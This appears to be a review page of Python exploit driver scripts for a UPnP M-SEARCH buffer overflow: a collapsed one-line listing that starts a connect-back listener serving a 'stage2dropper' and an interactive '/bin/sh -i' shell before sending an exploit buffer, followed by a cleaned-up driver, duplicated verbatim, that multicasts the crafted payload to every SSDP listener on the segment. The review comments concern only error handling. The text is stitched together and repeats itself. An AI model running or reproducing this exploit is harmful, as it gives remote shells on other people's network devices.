# NOTE(review): this listing is collapsed onto one line and starts mid-branch: the leading
# `print "Found value ..."` / `exit(0)` belong to an offset-search branch whose `if` is not
# visible here, so the enclosing structure (and the indentation the `else:` near the end
# belongs to) cannot be reconstructed from this page alone. The script proper starts at
# `addr=sys.argv[1]`: it starts a connect-back listener, opens a TCP connection to the target
# and sends the exploit buffer `buf` (built earlier in the file).
# Points a reviewer would raise before running this:
#  - sys.argv[1]/sys.argv[2] are used unchecked; a missing argument raises IndexError and a
#    non-numeric port raises ValueError, with no usage message.
#  - sock.send(str(buf)) does not guarantee the whole buffer is written; sendall() does.
#    sock.close() sits inside the try body, so the socket is never closed when connect()
#    or send() raises.
#  - the except branch logs "Failed to connect." twice and never reports the exception `e`,
#    so the actual cause (refused, timeout, DNS) is lost.
#  - TrojanServer(CALLBACK_IP, ..., connectback_shell=True, startcmd="/bin/sh -i") exposes a
#    listener that hands an interactive shell to whatever connects back; it is only torn down
#    explicitly on the failure path (server.shutdown()), so use it on a segment you control
#    and confirm server.wait() cleans up on the success path.
#  - exit(0) is the site-module builtin; sys.exit(0) is the portable form used elsewhere
#    in this line.
print "Found value %s at\noffset: %d" % (search_value,offset) exit(0) addr=sys.argv[1] port=int(sys.argv[2]) pid=1 files_to_serve=["./stage2dropper","./helloworld"] server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i") pid=server.serve() time.sleep(1) if pid: try: sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((addr,port)) logger.LOG_INFO("sending exploit.") sock.send(str(buf)) sock.close() server.wait() except Exception as e: logger.LOG_WARN("Failed to connect. ") logger.LOG_WARN("Failed to connect. Killing connect-back server.") server.shutdown() else: logger.LOG_WARN("Failed to start connect-back server.") sys.exit(1)
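# M-SEARCH exploit driver (script body). buffer_overflow_string, msearch_crash,
# connectback_server, send_multicast and logger are defined earlier in the file.
# Two modes:
#   * one argument  -> offset-search: report where that value (text, or a 0x-prefixed
#                      32-bit number) sits inside the overflow buffer;
#   * no argument   -> exploit: start the connect-back listener, multicast the crafted
#                      M-SEARCH request and wait for the callback.
# Changes from the original: argv text is kept for display instead of printing packed
# bytes, and a failure while sending now exits nonzero instead of silently ending with 0.
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)
pid = None

if len(sys.argv) > 1:
    # Offset-search mode. Keep what the user typed for the messages: the packed form of a
    # 0x value is raw bytes and unreadable on a terminal.
    search_arg = sys.argv[1]
    if search_arg.startswith("0x"):
        # Packed as big-endian 32-bit to match the byte order used in the overflow buffer.
        # struct.error is raised for values that do not fit in 32 bits.
        search_string = struct.pack(">L", int(search_arg, 0))
    else:
        search_string = search_arg
    offset = buffer_overflow_string.find_offset(search_string)
    if offset < 0:
        print("Couldn't find string %s in the overflow buffer." % search_arg)
    else:
        print("Found string %s at\noffset: %d" % (search_arg, offset))
else:
    # Exploit mode. The listener must be up before the payload goes out, otherwise the
    # target's callback has nothing to reach.
    pid = connectback_server.serve()
    if not pid:
        logger.LOG_WARN("Failed to start connect-backserver.")
        sys.exit(1)
    try:
        logger.LOG_INFO("Sending exploit")
        # NOTE: 239.255.255.250:1900 is the SSDP multicast group, so every UPnP/SSDP
        # listener on this segment receives the payload, not only the intended target.
        send_multicast("239.255.255.250", 1900, str(msearch_string))
        connectback_server.wait()
    except Exception as e:
        # Report the cause, tear the listener down and signal failure to the caller
        # (the original printed e and then exited with status 0).
        logger.LOG_WARN("Failed to send exploit: %s. Shutting down connect-back server." % e)
        connectback_server.shutdown()
        sys.exit(1)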
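# M-SEARCH exploit driver (script body). buffer_overflow_string, msearch_crash,
# connectback_server, send_multicast and logger are defined earlier in the file.
# Two modes:
#   * one argument  -> offset-search: report where that value (text, or a 0x-prefixed
#                      32-bit number) sits inside the overflow buffer;
#   * no argument   -> exploit: start the connect-back listener, multicast the crafted
#                      M-SEARCH request and wait for the callback.
# Changes from the original: argv text is kept for display instead of printing packed
# bytes, and a failure while sending now exits nonzero instead of silently ending with 0.
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)
pid = None

if len(sys.argv) > 1:
    # Offset-search mode. Keep what the user typed for the messages: the packed form of a
    # 0x value is raw bytes and unreadable on a terminal.
    search_arg = sys.argv[1]
    if search_arg.startswith("0x"):
        # Packed as big-endian 32-bit to match the byte order used in the overflow buffer.
        # struct.error is raised for values that do not fit in 32 bits.
        search_string = struct.pack(">L", int(search_arg, 0))
    else:
        search_string = search_arg
    offset = buffer_overflow_string.find_offset(search_string)
    if offset < 0:
        print("Couldn't find string %s in the overflow buffer." % search_arg)
    else:
        print("Found string %s at\noffset: %d" % (search_arg, offset))
else:
    # Exploit mode. The listener must be up before the payload goes out, otherwise the
    # target's callback has nothing to reach.
    pid = connectback_server.serve()
    if not pid:
        logger.LOG_WARN("Failed to start connect-backserver.")
        sys.exit(1)
    try:
        logger.LOG_INFO("Sending exploit")
        # NOTE: 239.255.255.250:1900 is the SSDP multicast group, so every UPnP/SSDP
        # listener on this segment receives the payload, not only the intended target.
        send_multicast("239.255.255.250", 1900, str(msearch_string))
        connectback_server.wait()
    except Exception as e:
        # Report the cause, tear the listener down and signal failure to the caller
        # (the original printed e and then exited with status 0).
        logger.LOG_WARN("Failed to send exploit: %s. Shutting down connect-back server." % e)
        connectback_server.shutdown()
        sys.exit(1)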